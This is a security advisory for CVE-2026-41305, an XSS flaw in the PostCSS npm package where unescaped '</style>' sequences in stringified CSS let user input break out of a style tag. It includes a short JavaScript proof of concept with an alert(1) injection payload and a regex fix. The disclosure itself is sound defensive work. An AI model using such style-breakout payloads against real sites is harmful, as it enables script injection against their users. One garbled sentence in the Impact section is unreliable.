GHSA-qx2v-qp2m-jg93

Source

https://github.com/advisories/GHSA-qx2v-qp2m-jg93

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-qx2v-qp2m-jg93/GHSA-qx2v-qp2m-jg93.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-qx2v-qp2m-jg93

Aliases

CVE-2026-41305

Downstream

MINI-62h8-7mgp-qhxg

MINI-q7jg-3398-7644

Related

CGA-jr2c-rgcp-7w5j

Published

2026-04-24T15:31:42Z

Modified

2026-05-06T17:44:15.783349140Z

Severity

6.1 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CVSS Calculator

Summary

PostCSS has XSS via Unescaped </style> in its CSS Stringify Output

Details

PostCSS: XSS via Unescaped `</style>` in CSS Stringify Output

Summary

PostCSS v8.5.5 (latest) does not escape </style> sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML <style> tags, </style> in CSS values breaks out of the style context, enabling XSS.

Proof of Concept

const postcss = require('postcss');

// Parse user CSS and re-stringify for page embedding
const userCSS = 'body { content: "</style><script>alert(1)</script><style>"; }';
const ast = postcss.parse(userCSS);
const output = ast.toResult().css;
const html = `<style>${output}</style>`;

console.log(html);
// <style>body { content: "</style><script>alert(1)</script><style>"; }</style>
//
// Browser: </style> closes the style tag, <script> executes

Tested output (Node.js v22, postcss v8.5.5):

Input: body { content: "</style><script>alert(1)</script><style>"; }
Output: body { content: "</style><script>alert(1)</script><style>"; }
Contains </style>: true

Impact

Impact non-bundler use cases since bundlers for XSS on their own. Requires some PostCSS plugin to have malware code, which can inject XSS to website.

Suggested Fix

Escape </style in all stringified output values:

output = output.replace(/<\/(style)/gi, '<\\/$1');

Credits

Discovered and reported by Sunil Kumar (@TharVid)

Database specific

{
    "cwe_ids": [
        "CWE-79"
    ],
    "nvd_published_at": "2026-04-24T03:16:11Z",
    "severity": "MODERATE",
    "github_reviewed_at": "2026-04-24T15:31:42Z",
    "github_reviewed": true
}

References

Affected packages

npm / postcss

Package

Name: postcss; View open source insights on deps.dev
Purl: pkg:npm/postcss

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

8.5.10

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-qx2v-qp2m-jg93/GHSA-qx2v-qp2m-jg93.json"